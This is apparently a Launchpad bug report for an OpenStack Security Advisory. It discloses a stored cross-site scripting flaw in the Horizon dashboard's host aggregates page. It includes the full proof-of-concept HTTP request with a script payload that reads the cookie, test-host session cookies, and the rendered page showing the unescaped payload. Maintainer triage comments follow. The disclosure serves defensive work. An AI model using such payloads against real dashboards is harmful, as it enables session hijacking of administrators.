OpenStack Security Advisory

Stored Cross Site Scripting issue for /admin/aggregates/

Bug #1355487 reported by Michael Xin
260
This bug affects 1 person
Affects Status Importance Assigned to Milestone
OpenStack Dashboard (Horizon)
New
Undecided
Unassigned
OpenStack Security Advisory
Confirmed
Medium
Unassigned

Bug Description

/admin/aggregates/ is subject to stored cross site scripting issue. The impacted parameter is availability_zone.

For example, here is the request for the update:
POST /admin/aggregates/1/update/ HTTP/1.1
Host: 23.253.125.245
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://23.253.125.245/admin/aggregates/
Content-Length: 192
Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; sessionid=".eJytV1lzG0UQDo5jJ3YuAjEhHDG3wiHNPbvhSgiEACGAyVbpxaWaa7Mi0q5H2nXIw1bBC_-HP8Q7_4KelUQChQ7AerBnZ2e_6e-b7p7un9Zq_1QrOVvlY1McONsriwcuT3axNphTwgQXGGtFIyaUVnFEUiMiitJksxq7Ua9vu7vHjh3TEeWKGMKVwizmaay5xQx-lMeWI-HXku2Ru98v8l6uhu5ucqanqjLrTTGyteTc9LXL7UHRz8vuFYDNyvLgWqdDaJtw2saEtwnj1zhCqHNI2sgfT84BwGHfuHFv8n33FHy21wy_yZ1fTy48sZFWBrjZ5E0gmo9LeGpetqfz7a_co3FZ5O6T6bozAzUue8qU_cN--ejLX2_9_n1yotHH_A0hwG_dC2-2_ImrP_uN2m-2kg1bDFU_9ydrf6qVrPWt37qbrAcB_PbdKjk7tf2mKtWguO9P7_szrdqfbTUkZkKM_bl9f772T7e6J2Fa2WE_T_bu-Avdj-YqFEnJQKGOcpGRPLVpTCVDkdUaE8tTrAnBShDe3QCIiXD-mWy9uwaPYOWzzZnGEY0lFixOGWeWW0WkVQ4pEmOpXKq722F1XrpRrgbBootHYVGgflDpQd8EyJ0jgPTPVap77klFe4N-_mDsL-1312G6fHTg_PPdTRiaYnhQla6Zbo7p8mRYHKqq9i-0MjiKF2v_Uiu70H1hrmGxiEUne-avrphNROWSRQ4zjqWImOIukohyw1KMuTKakuziUuCdZSsqlV3azyaMclc-LEYPssvTp6ocFTlwebnhcqX2u4HLQpHFKiLPoYtjbWKjU2qZYFLzSJmYOh2ZNDJEWZYt8ZnV9l7iJSuBzEQLMXZYDKqhOySgWng0_dxCpBKQ7ZVGtldr_1qQ7aUlvknnqMKoSmPBeapSyqRAEdII0VgJSJ9gpQJVlkPvLF8z43TqsWvDh5ebqA8-DStq_3pD6Y3avxkoXZ6LSeE3h4_UwqhYwPkawRCmilinLMURgQuAaQl8luDuLFkwYxIS1DhQmAzA_Lca8yFtXl1sfkxiMsd8aqlwXHIljGTaOS1TDJdcStI0tRqJheY3uIvMDwtm5p8IGXOo7rvpIdwfqNw4YPF2w-Kd2r8bWFxfdLBx5xC30X8NSCkdQiRCsNgxgmVMGSQeSyS4ImXUAtcj2X3nSGCeDEoLt6RW4yBdkBHy2GFQ7r1GuXbtO0sisika8BxZREog_GBHJiRLtdbMMRUpHklHIiz14oicQi-MyMmaGaGzISIHRWXTYjRUJdiSTa6azKkSWKGGFa49WSU94__qDaFUg2ouNpRBqAoTcwx_IGaxIBYKvRXS8wp7L0_Py0Fmwm38mZ6nITRJziAZbSRjtedBsquLdqSdWdXYuRHKqTnqIMSMUZzGqXLMIBMRzR2WHEdOEJNyUGfVbW6GswYh_tX6GefjoXYx4TaajoCtaNjK2kdLHARI_A8HQUK7SFjDGBfMOqQFtYQ6BMndKh4vcZBV917oICuCzMQ6A0jFyGRuXI7-IbDiRrdrtX9_8XURwaU8TxNiZRQZRA2xLFJSoRiKudRFKbM4bTS5uRA30LmR3LvdW0GYI0KaqXM6qKN_cKZ8Dzqd0SyZjh_206DOB406H9b-o6DO7vwrmVMumxZsjkZEpDiSMTYaWah2kMbGYIpDlnVG6pBPV-jvsp3s-JNXQN-6vIRObFqXPZi2a5VLToyKgRv7j_f9dSgFbkwX9IZuqKHvG9f-E5g6P3WD3qRxKx7mbgSvbk5FaDqrsYNWOPSKk9YNelP_abJpXaqqQek_Szbdjwf9EWx1y8CF5Mr-0G39OfCfJ1ubv53cfu7i001mGheRQLg9_b-VlGbL376657_4Zc9_mWwejIpwEv6r2t9pZVuNcEubma-z7cfWeugi14O5_pvafwsY2dpfXn9XNV3nXrILZVgaM6y1krGwyFqEoC1nUIFCia619N8nG6XLVV76e9mdSlftPwAqQEGv:1XGyHp:Um-2q06zpKC9jj_-kA_gP0kXeAk"; horizon.tabs=%7B%22undefined%22%3A%22%23launch_database__setinstancedetailsaction%22%7D
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

csrfmiddlewaretoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK&name=invisible_to_admin%3Cscript%3Exss%3C%2Fscript%3E&availability_zone=invisible_to_admin%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

The response is the following:
HTTP/1.1 200 OK
Date: Mon, 11 Aug 2014 22:42:13 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Horizon-Location: /admin/aggregates/
Vary: Cookie
Set-Cookie: sessionid=".eJy1V1l320QULmmWNqEJdKElLA27C9SeXVJZS9kpLaTVOX7J8ZlNlYktZWwppQ86B174Z_wN3vkX3JHlsKW2ywl-SEYazb33--auPy1V7qlWvFlmY50fWNMr8n2bxTtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33Z1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbIPujnWS-TQ3snPteTZZH2GhnpUrzVbNvMHOT9rOheBbFpURzc6HQIbRNO25jwNmH8BkcIdQ5JG7nT8RYIOOxrO-5NznfPwrHdenk3s245Pv8XRUpqwGbiNwFoNi7gqd5sN-_b39hH4yLP7CfNd-cGclz0pC76h_3i0de_fv77vXil5kf_Q4IXv37f76y7lWs_u9XKrbXiVZMPZT9zZyp3thUv9Y1bvxMvewLcxp0y3mxsvyULOcgfuKf33LlW5TZb3S0AMSVi3Bv0s_2x29qrsR29ds_suWcrd77VPQOvpRn2s3j3trvQ_fCxxIVBwIC4jrShDnhikogGDIVGKUwMT7AiBEtBeHcVREz4dBfT5VrvQakGfe01XDoBDe657hIIAUYu1_4ThTQKsGBRwjgz3EgSGGmRJBEOpE1Ud8N_nRV2lMmBN-LKCRhRyu4yCCkeHVj3fHcNljofHpSFrV_X17Q9WeaHsqzcC610ay8F2l-s3Eut9EL3hceaEIlIdNKLf_fG9NLcExM2eMBCixnHgQiZ5DYMEOWaJRhzqRUl6ZV5gkqZThBltniYj_bT7eapLEZ5BlhenmK5Wrkdj2UmnWIROo-BewJCJ4zgSOlIq4QaJligeCh1RK0KdRJqIg1L5_jDQrpq0nwwHeaDcmgPCbDmH3U_MxCpBGh7ZUrbq5V7zdP20hwvpMewMv_MBDSjMokE54lMKAsECpFCiEZSQJYFJBJAzxVVYzr7p2uD8O06vL1Pw3blXp9CeqNyb3pI24-VSeF3DJ45ByZgAiW0jATcnRYMYSqJsdJQHBIoEkwFAGa2nBqJTxpjD2GyAPPfmpoPmfPabPMjEpEnMr8-MDGfGiosD7gUOmDKWhUkGAphQpIkMQqJmeZ7ObX5Kz6LDeUD21zCg4HMtAUUb09RvFO5dz2Kj2ddbNQ5xG30XwLyRMQ2FxpYhEiIYNMygoOIMshOhgTgrZRRA4ychLajoDRQJZUce-o8jZDHDj1z16fMtSvXmRORdd-AnywimzMTzCIhEH5gFRMBS5RSzDIZSh4GloQ4ULMjciKqBrTpI3KQlybJR0NZgCHppNSkVhaACk1R4cqRRdIz_j_S8wJCm0wFLR90hZGmDMJZ6Ihj-ANxjQUx0DAukJ7n66qJWz1Kz00ITZIzUEanlLHKcU_ZtVkaaWfaOHZu-tbpGHYWPX_L32NDBEJMa8lplEjLNNIhUdzigOPQCqITDkQ8kdga82nf9mlfjZoVoBVTtEHlwjkOAkadvIMsKrThRSgbCqMZ44IZi5SghlCLoAAYyaM5DrKgrpqscyAmH-nUjovRMYEVTXm7Ubn3ZpeLEAruMZzcmnnA23kzvv9lb1FiiAnCUCOqiWGhDCSKoOlLbJgwg5OamBNSWLPztGdH_WB1cR0mndE0mY4f9hPPzvtTdj6o3IeenZ3Hl2ROeVBPYf_mKD3doCMiwWEQYa2QgW4GKaw1pthnUasD5fPlAmPeUQnoG5sVMIk1fdl-M66VNl4Z5QM7dh_tuY-hD7jZfNAb2qGCuW9cuU_g1TONG_Qmg1v-MLMj2LrVkFCPUGMLo7CfFSejG8ym7tN4zdhEloPCfRav2R8P-iNQ9bmGgmSL_tCuHy3cF_H62m9nNi5ferbOTOM8FAi3m__rcaHX3ZfXdt1Xv-y6r-O1g1Hub8J9U7nbrXS9Zmzu4PRtuvGntQ6myGVvrrtbue9ARrr0t-3vy3rq3I13oMVKIoaVkkEkDDIGIRjLGbSW0ForFbh78WphM5kV7n56u1Rl-w8FGkG3:1XGyI9:Z4FqhXc2db7HwwtZeSi0DIW8YRQ"; httponly; Path=/
Set-Cookie: messages="3b207814661220efb902165acec019e6a6d9fbc3$[[\"__json_message\"\0540\05425\054\"Successfully updated aggregate: \\\"invisible_to_admin<script>xss</script>.\\\"\"]]"; Path=/
Content-Length: 0
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 540554-SAT6WWSG03.secops.rackspace.com

The GET request looks like:
GET /admin/aggregates/ HTTP/1.1
Host: 23.253.125.245
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://23.253.125.245/admin/aggregates/
Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; sessionid=".eJy1V1l320QULmmWNqEJdKElLA27C9SeXVJZS9kpLaTVOX7J8ZlNlYktZWwppQ86B174Z_wN3vkX3JHlsKW2ywl-SEYazb33--auPy1V7qlWvFlmY50fWNMr8n2bxTtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33Z1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbIPujnWS-TQ3snPteTZZH2GhnpUrzVbNvMHOT9rOheBbFpURzc6HQIbRNO25jwNmH8BkcIdQ5JG7nT8RYIOOxrO-5NznfPwrHdenk3s245Pv8XRUpqwGbiNwFoNi7gqd5sN-_b39hH4yLP7CfNd-cGclz0pC76h_3i0de_fv77vXil5kf_Q4IXv37f76y7lWs_u9XKrbXiVZMPZT9zZyp3thUv9Y1bvxMvewLcxp0y3mxsvyULOcgfuKf33LlW5TZb3S0AMSVi3Bv0s_2x29qrsR29ds_suWcrd77VPQOvpRn2s3j3trvQ_fCxxIVBwIC4jrShDnhikogGDIVGKUwMT7AiBEtBeHcVREz4dBfT5VrvQakGfe01XDoBDe657hIIAUYu1_4ThTQKsGBRwjgz3EgSGGmRJBEOpE1Ud8N_nRV2lMmBN-LKCRhRyu4yCCkeHVj3fHcNljofHpSFrV_X17Q9WeaHsqzcC610ay8F2l-s3Eut9EL3hceaEIlIdNKLf_fG9NLcExM2eMBCixnHgQiZ5DYMEOWaJRhzqRUl6ZV5gkqZThBltniYj_bT7eapLEZ5BlhenmK5Wrkdj2UmnWIROo-BewJCJ4zgSOlIq4QaJligeCh1RK0KdRJqIg1L5_jDQrpq0nwwHeaDcmgPCbDmH3U_MxCpBGh7ZUrbq5V7zdP20hwvpMewMv_MBDSjMokE54lMKAsECpFCiEZSQJYFJBJAzxVVYzr7p2uD8O06vL1Pw3blXp9CeqNyb3pI24-VSeF3DJ45ByZgAiW0jATcnRYMYSqJsdJQHBIoEkwFAGa2nBqJTxpjD2GyAPPfmpoPmfPabPMjEpEnMr8-MDGfGiosD7gUOmDKWhUkGAphQpIkMQqJmeZ7ObX5Kz6LDeUD21zCg4HMtAUUb09RvFO5dz2Kj2ddbNQ5xG30XwLyRMQ2FxpYhEiIYNMygoOIMshOhgTgrZRRA4ychLajoDRQJZUce-o8jZDHDj1z16fMtSvXmRORdd-AnywimzMTzCIhEH5gFRMBS5RSzDIZSh4GloQ4ULMjciKqBrTpI3KQlybJR0NZgCHppNSkVhaACk1R4cqRRdIz_j_S8wJCm0wFLR90hZGmDMJZ6Ihj-ANxjQUx0DAukJ7n66qJWz1Kz00ITZIzUEanlLHKcU_ZtVkaaWfaOHZu-tbpGHYWPX_L32NDBEJMa8lplEjLNNIhUdzigOPQCqITDkQ8kdga82nf9mlfjZoVoBVTtEHlwjkOAkadvIMsKrThRSgbCqMZ44IZi5SghlCLoAAYyaM5DrKgrpqscyAmH-nUjovRMYEVTXm7Ubn3ZpeLEAruMZzcmnnA23kzvv9lb1FiiAnCUCOqiWGhDCSKoOlLbJgwg5OamBNSWLPztGdH_WB1cR0mndE0mY4f9hPPzvtTdj6o3IeenZ3Hl2ROeVBPYf_mKD3doCMiwWEQYa2QgW4GKaw1pthnUasD5fPlAmPeUQnoG5sVMIk1fdl-M66VNl4Z5QM7dh_tuY-hD7jZfNAb2qGCuW9cuU_g1TONG_Qmg1v-MLMj2LrVkFCPUGMLo7CfFSejG8ym7tN4zdhEloPCfRav2R8P-iNQ9bmGgmSL_tCuHy3cF_H62m9nNi5ferbOTOM8FAi3m__rcaHX3ZfXdt1Xv-y6r-O1g1Hub8J9U7nbrXS9Zmzu4PRtuvGntQ6myGVvrrtbue9ARrr0t-3vy3rq3I13oMVKIoaVkkEkDDIGIRjLGbSW0ForFbh78WphM5kV7n56u1Rl-w8FGkG3:1XGyI9:Z4FqhXc2db7HwwtZeSi0DIW8YRQ"; horizon.tabs=%7B%22undefined%22%3A%22%23launch_database__setinstancedetailsaction%22%7D; messages="3b207814661220efb902165acec019e6a6d9fbc3$[[\"__json_message\"\0540\05425\054\"Successfully updated aggregate: \\\"invisible_to_admin<script>xss</script>.\\\"\"]]"
Connection: keep-alive

And the response contains the injection XSS payload:
HTTP/1.1 200 OK
Date: Mon, 11 Aug 2014 22:42:14 GMT
Server: Apache/2.4.7 (Ubuntu)
Vary: Accept-Language,Cookie,Accept-Encoding
X-Frame-Options: SAMEORIGIN
Content-Language: en
Set-Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; expires=Mon, 10-Aug-2015 22:42:14 GMT; Max-Age=31449600; Path=/
Set-Cookie: sessionid=".eJy1V1tz20QULmkubUIbWiiXQGm4FQeovXdJBUpLuBQoBUI145eMZ2-qTG0pa0spfdAMvPDT-Bm88y84K8u0MIntMsEPyUqrPed8357rL0uVe6YVny-zsc4PrOkV-QObxdtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33e1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbI3u_nWS-TQ3s3PteTZZH2GhnpUrzZbNvMHOT9rOheAbFpURxc73QIbRNO25jwNmH8OkcIdQ5JG7nT8SYIOOxrO-5NznfPwrG9evldZt1yfPEJRUpqwGbiqwA0GxfwVG-2m_ftb-yjcZFn9tPmu3MDOS56Uhf9w37x6Ovfv_jzx3il5kf_S4IXv37P76y7lZ1f3Wrl1lrxqsmHsp-5M5U724qX-sat342XPQFu424Zn29s35WFHOT33bP77lyrcudbNYgpEWO3ue-eq9yFVvcMvJZm2M_ivTvuYvfGsQyFQcCAoY60oQ54YpKIBgyFRilMDE-wIgRLQXh3FURMiHPPp8vdDXgElXaUyYHX8cJJ6FjyQo27VDtKFNIowIJFCePMcCNJYKRFkkQ4kDZRNfSDUg362hvw4gkY4F4qZXfzSUZ7g372YOxe3u8uw-vi0YF1r3TXYKnz4UFZ2Pp1fU1bk2V-KMvKvdpK4Speq9zlVnqx--qxhkUiEp30-X-6YvrC3BMThnjAQosZx4EImeQ2DBDlmiUYc6kVJemL8wSVMn15P50gymzxMB89SLeap7IY5Rlgeb3GcqVy2x7LTJLFIiQfAfcEhE4YwZHSkVYJNUywQPFQ6ohaFeok1EQals7xkoV0TUnzMXaYD8qhPSTAmn_U_cxApBKg7Y2atjcr95an7fIc36RHsDL_zAQ0ozKJBOeJTCgLBAqRQohGUkCKBSQSQM8VNcV09rFrg_ytOuq9T8MXlXu7hvRO5a56SFvHyqTwOwLPnAMTMIESWkYC7k4LhjCVxFhpKA4JVAimAgAzW84Uic8lYw9hsgDz363Nh7S5M9v8iETkqcyvD0zMp4YKywMuhQ6YslYFCYYqmJAkSYxCYqb5Xs7U_BWfCofyvm0u4f5AZtoCivdqFO9X7gOP4uasi406h7iN_ktAnojY5kIDixAJEWxaRnAQUQbZyZAAvJUyaoCRk9D2ZFAaqJJKjj11nkbIY4eeuWs1c-3KdeZEZN004KeLyObMBLNICIQfWMVEwBKlFLNMhpKHgSUhDtTsiJyImgI67yNykJcmyUdDWYAt6aTUpFYWgArVqHDlyCLpGf8f6XkBoU2mgn4PWsJIUwbhLHTEMfyBuMaCGOgWF0jP83VNiVv9Oz03ITRJzkAZrSljleOesp1ZGmln2jV2bvl26gh2Fj2_6y-xIQIhprXkNEqkZRrpkChuccBxaAXRCQcinkrsFPNp37toX42aFaAVNdqgcuEcBwGjTt5BFhXa8CKUDYXRjHHBjEVKUEOoRVAAjOTRHAdZUNeUrHMgKR_p1I6L0RGBFdW8Xa_ch7PLRQgF9whOdmce8Hbeiu_d7i1KDDFBGGpENTEslIFEETR9iQ0TZnBSE3NCCqfsPOvZUT9ZXVyDSWc0Tabjh_3Es_NRzc7Hlbvh2dk-viRzyoN6BDuCowUGtwY_EQkOgwhrhQz0O0hhrTHFPs9aHSjIqOnpJ0tA39isgEms6cseNONaaeOVUT6wY_fJvrsJrcCt5oPe0A4VzH3jyn0Kr55r3KA3Gdzyh5kdwdZuQ0I9WY0tjMJ-VpyMbjCbus_iNWMTWQ4K93m8Zn8-6I9A1RcaCpIt-kO7_vfCfRmvr_1xZuOlSxfqzDTOQ4Fwu_m_Hhd63d3e2XNf_bbnvo7XDka5vwn3TeXutNL1mpK5w8y36cZjax1MkcveXPdd5b4HGenSP7Z_KOupcy_ehi4riRhWSgaRMMgYhGAsZ9BdQnetVOB-jFcLm8mscPfSO6Uq238BBl5BxA:1XGyIA:-6Qt3ZZ7PkdNVpPYJOElOMzR-9k"; httponly; Path=/
Set-Cookie: messages=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
Content-Type: text/html; charset=utf-8
Content-Length: 14400
Age: 0
Via: 1.1 540554-SAT6WWSG03.secops.rackspace.com

<!DOCTYPE html>
<html>
  <head>
    <meta content='text/html; charset=utf-8' http-equiv='Content-Type' />

    <title>Host Aggregates - OpenStack Dashboard</title>

<link rel="stylesheet" href="/static/dashboard/css/6bf08293a8e0.css" type="text/css" media="screen" />

<link rel="shortcut icon" href="/static/dashboard/img/favicon.ico"/>

<script type="text/javascript" src="/static/dashboard/js/0272dc9e5c21.js"></script>

    <script type="text/javascript" charset="utf-8">
  /*
    Added so that we can append Horizon scoped JS events to
    the DOM load events without running in to the "horizon"
    name-space not currently being defined since we load the
    scripts at the bottom of the page.
  */
  var addHorizonLoadEvent = function(func) {
    var old_onload = window.onload;

    if (typeof window.onload != 'function') {
      window.onload = func;
    } else {
      window.onload = function() {
        old_onload();
        func();
      }
    }
  }
</script>

  </head>
  <body id="" ng-app='hz'>

      <div id="container">
        <div class='topbar'>

<h1 class="brand"><a href="/home/">OpenStack Dashboard</a></h1>

<div class="context-box">
  <div id="tenant_switcher" class="dropdown switcher_bar" tabindex="1">

      <a class="dropdown-toggle" data-toggle="dropdown" href="#tenant_switcher">

    <h3>admin</h3>

      </a>

      <ul id="tenant_list" class="dropdown-menu">
        <li class='divider'></li>

              <li><a href="/auth/switch/9b2a33fc33134aae97f530bd9b2da86d/?next=/admin/">demo</a></li>

      </ul>

  </div>

</div>

<div id="user_info" class="pull-right">
  <div id="profile_editor_switcher" class="dropdown switcher_bar" tabindex='1'>
    <a class="dropdown-toggle" data-toggle="dropdown" href="#profile_editor_switcher">
      <div>admin</div>
    </a>
    <ul id="editor_list" class="dropdown-menu">
      <li class='divider'></li>
      <li><a href="/settings/">Settings</a></li>

        <li><a href="http://docs.openstack.org" target="_new">Help</a></li>

    </ul>
  </div>

  <a href="/auth/logout/">Sign Out</a>

</div>

        </div>
        <div id='main_content'>

<div class="messages">

    <div class="alert alert-block alert-success fade in">
      <a class="close" data-dismiss="alert" href="#">&times;</a>
      <p><strong>Success: </strong>Successfully updated aggregate: &quot;invisible_to_admin&lt;script&gt;xss&lt;/script&gt;.&quot;</p>
    </div>

</div>

<div class='sidebar'>

<div>
  <dl class="nav_accordion">

        <dt >
          <div>Project</div>
        </dt>

        <dd style="display:none;">

            <div><h4><div>Compute</div></h4>

            <ul>

              <li><a href="/project/" >Overview</a></li>

              <li><a href="/project/instances/" >Instances</a></li>

              <li><a href="/project/volumes/" >Volumes</a></li>

              <li><a href="/project/images/" >Images</a></li>

              <li><a href="/project/access_and_security/" >Access &amp; Security</a></li>

            </ul>

              </div>

            <div><h4><div>Network</div></h4>

            <ul>

              <li><a href="/project/network_topology/" >Network Topology</a></li>

              <li><a href="/project/networks/" >Networks</a></li>

              <li><a href="/project/routers/" >Routers</a></li>

              <li><a href="/project/loadbalancers/" >Load Balancers</a></li>

            </ul>

              </div>

            <div><h4><div>Object Store</div></h4>

            <ul>

              <li><a href="/project/containers/" >Containers</a></li>

            </ul>

              </div>

            <div><h4><div>Orchestration</div></h4>

            <ul>

              <li><a href="/project/stacks/" >Stacks</a></li>

            </ul>

              </div>

            <div><h4><div>Databases</div></h4>

            <ul>

              <li><a href="/project/databases/" >Database Instances</a></li>

              <li><a href="/project/database_backups/" >Database Backups</a></li>

            </ul>

              </div>

        </dd>

        <dt class="active">
          <div>Admin</div>
        </dt>

        <dd>

            <div><h4><div>System Panel</div></h4>

            <ul>

              <li><a href="/admin/" >Overview</a></li>

              <li><a href="/admin/hypervisors/" >Hypervisors</a></li>

              <li><a href="/admin/aggregates/" class="active" >Host Aggregates</a></li>

              <li><a href="/admin/instances/" >Instances</a></li>

              <li><a href="/admin/volumes/" >Volumes</a></li>

              <li><a href="/admin/flavors/" >Flavors</a></li>

              <li><a href="/admin/images/images/" >Images</a></li>

              <li><a href="/admin/networks/" >Networks</a></li>

              <li><a href="/admin/routers/" >Routers</a></li>

              <li><a href="/admin/info/" >System Info</a></li>

            </ul>

              </div>

            <div><h4><div>Identity Panel</div></h4>

            <ul>

              <li><a href="/admin/projects/" >Projects</a></li>

              <li><a href="/admin/users/" >Users</a></li>

            </ul>

              </div>

        </dd>

  </dl>
</div>

</div>

          <div id='content_body'>

  <div class='page-header'>
    <h2>Host Aggregates</h2>
  </div>

  <div id="host-aggregates">

<div class="table_wrapper">
  <form action="/admin/aggregates/" method="POST"><input type='hidden' name='csrfmiddlewaretoken' value='I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK' />

  <table id="host_aggregates" class="table table-bordered table-striped datatable">
    <thead>

      <tr class='table_caption'>
        <th class='table_header' colspan='6'>
          <h3 class='table_title'>Host Aggregates</h3>

<div class="table_actions clearfix">

    <div class="table_search client">
        <input class="span3 example" value="" type="text" name="host_aggregates__filter__q" />
        <button type="submit" class="btn btn-small btn-search" id="host_aggregates__action_filter">Filter</button>
    </div>

                <a href='/admin/aggregates/create/' title='Create Host Aggregate' class="btn btn-small ajax-modal btn-create" id="host_aggregates__action_create">Create Host Aggregate</a>

                <button class="btn btn-small btn-danger btn-delete" id="host_aggregates__action_delete" name="action" value="host_aggregates__delete" type="submit">Delete Host Aggregates</button>

    </div>

        </th>
      </tr>

      <tr>

          <th class="multi_select_column"></th>

          <th class="sortable normal_column">Name</th>

          <th class="sortable normal_column">Availability Zone</th>

          <th class="sortable normal_column">Hosts</th>

          <th class="sortable normal_column">Metadata</th>

          <th class="actions_column">Actions</th>

      </tr>

    </thead>

    <tbody>

      <tr class="" data-display="invisible_to_admin&lt;script&gt;xss&lt;/script&gt;" data-object-id="1" id="host_aggregates__row__1">
    <td class="multi_select_column"><input class="table-row-multi-select" name="object_ids" type="checkbox" value="1" /></td><td class="sortable normal_column">invisible_to_admin&lt;script&gt;xss&lt;/script&gt;</td><td class="sortable normal_column">invisible_to_admin&lt;script&gt;alert(document.cookie)&lt;/script&gt;</td><td class="sortable normal_column"></td><td class="sortable normal_column"><li>availability_zone = invisible_to_admin<script>alert(document.cookie)</script></li></td><td class="actions_column"><div class="btn-group"><a href='/admin/aggregates/1/update/' class="btn btn-small ajax-modal btn-edit" id="host_aggregates__row_1__action_update">Edit Host Aggregate</a><a class="btn btn-small dropdown-toggle" data-toggle="dropdown" href="#">
            More
            <span class="caret"></span></a><ul class="dropdown-menu row_actions clearfix"><li class="clearfix"><a href='/admin/aggregates/1/manage_hosts/' class="btn btn-small ajax-modal btn-create" id="host_aggregates__row_1__action_manage">Manage Hosts</a></li><li class="clearfix"><button class="btn btn-small btn-danger btn-delete" id="host_aggregates__row_1__action_delete" name="action" value="host_aggregates__delete__1" type="submit">Delete Host Aggregate</button></li></ul></div></td>
</tr>

    </tbody>

    <tfoot>

      <tr>
        <td colspan="6">
          <span class="table_count">Displaying 1 item</span>

        </td>
      </tr>
    </tfoot>

  </table>

  </form>
</div>

  </div>

  <div id="availability-zones">

<div class="table_wrapper">
  <form action="/admin/aggregates/" method="POST"><input type='hidden' name='csrfmiddlewaretoken' value='I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK' />

  <table id="availability_zones" class="table table-bordered table-striped datatable">
    <thead>

      <tr class='table_caption'>
        <th class='table_header' colspan='3'>
          <h3 class='table_title'>Availability Zones</h3>

<div class="table_actions clearfix">

    <div class="table_search client">
        <input class="span3 example" value="" type="text" name="availability_zones__filter__q" />
        <button type="submit" class="btn btn-small btn-search" id="availability_zones__action_filter">Filter</button>
    </div>

    </div>

        </th>
      </tr>

      <tr>

          <th class="sortable normal_column">Availability Zone Name</th>

          <th class="sortable normal_column">Hosts</th>

          <th class="sortable normal_column">Available</th>

      </tr>

    </thead>

    <tbody>

      <tr class="" data-object-id="internal" id="availability_zones__row__internal">
    <td class="sortable normal_column">internal</td><td class="sortable normal_column"><li>mxindevstack2 (Services Up)</li></td><td class="status_up sortable normal_column">Yes</td>
</tr>

      <tr class="" data-object-id="nova" id="availability_zones__row__nova">
    <td class="sortable normal_column">nova</td><td class="sortable normal_column"><li>mxindevstack2 (Services Up)</li></td><td class="status_up sortable normal_column">Yes</td>
</tr>

    </tbody>

    <tfoot>

      <tr>
        <td colspan="3">
          <span class="table_count">Displaying 2 items</span>

        </td>
      </tr>
    </tfoot>

  </table>

  </form>
</div>

  </div>

          </div>
        </div>
      </div>

    <div id="footer">

    </div>

<script type="text/javascript" src="/i18n/js/horizon/"></script>

<script type="text/javascript" src="/static/dashboard/js/b28ee7422312.js"></script>

<script type="text/html" id="modal_template">

<div class="modal hide">
  <div class='modal-header'>
    <a class='close' data-dismiss='modal'>&times;</a>
    <h3>{{title}}</h3>
  </div>
  <div class='modal-body'>
    {{body}}
  </div>
  <div class='modal-footer'>
    <a href='#' class='btn btn-primary'>{{confirm}}</a>
    <a href='#' class='btn cancel' data-dismiss='modal'>{{cancel}}</a>
  </div>
</div>

</script>

<script type="text/html" id="empty_row_template">

<tr class="odd empty"><td colspan="{{colspan}}">{{no_items_label}}</td></tr>

</script>

<script type="text/html" id="alert_message_template">

<div class="alert alert-block fade in alert-{{type}}">
  <a class="close" data-dismiss="alert" href="#">&times;</a>
  <p>
    <strong>{{type_display}}</strong>
    {{#safe}}
      {{{message}}}
    {{/safe}}
    {{^safe}}
      {{message}}
    {{/safe}}
  </p>
</div>

</script>

<script type="text/html" id="spinner-modal">

<div class="modal loading hide">
  <p>{{text}}&hellip;</p>
</div>

</script>

<script type="text/html" id="membership_template">

<ul class="nav nav-pills btn-group">
  <li class="member" data-{{step_slug}}-id="{{data_id}}">
    <span class="display_name">{{display_name}}</span>
  </li>
  <li class="active"><a class="btn btn-primary" href="#add_remove">{{text}}</a></li>
  <li class="dropdown role_options">
    <a class="dropdown-toggle" data-toggle="dropdown" href="#">
      <span class="roles_display">{{roles_label}}</span>
      <b class="caret"></b>
    </a>
    <ul class="dropdown-menu role_dropdown clearfix">
      {{#roles}}
      <li data-role-id="{{role_id}}"><i class="icon-ok"></i> {{role_name}}</li>
      {{/roles}}
    </ul>
  </li>
</ul>

</script>

<script type='text/javascript' charset='utf-8'>
  // Call init on DOM ready.
  $(document).ready(horizon.init);
</script>

    <div id="modal_wrapper" />
  </body>
</html>

See original description
Revision history for this message
Michael Xin (michael-xin) wrote :
Revision history for this message
Jeremy Stanley (fungi) wrote :

I've added an incomplete security advisory task, pending additional feedback/confirmation from Horizon core security reviewers.

Changed in ossa:
status: New → Incomplete
Michael Xin (michael-xin)
summary: - Reflected Cross Site Scripting issue for /admin/aggregates/
+ Stored Cross Site Scripting issue for /admin/aggregates/
description: updated
Revision history for this message
Paul McMillan (paul-mcmillan) wrote :

This looks legitimate to me. My typical comments on finding time to actually fix the root cause of this by properly rendering template snippets rather than trying to do ad-hoc sanitization still apply. The underlying framework CAN help us avoid these problems, but Horizon as written isn't allowing it to do so.

Revision history for this message
Thierry Carrez (ttx) wrote :

Sigh ;)

Changed in ossa:
importance: Undecided → Medium
status: Incomplete → Confirmed
Revision history for this message
Thierry Carrez (ttx) wrote :

Horizon core-sec: anyone up for a patch there ?

Revision history for this message
Tristan Cacqueray (tristan-cacqueray) wrote :

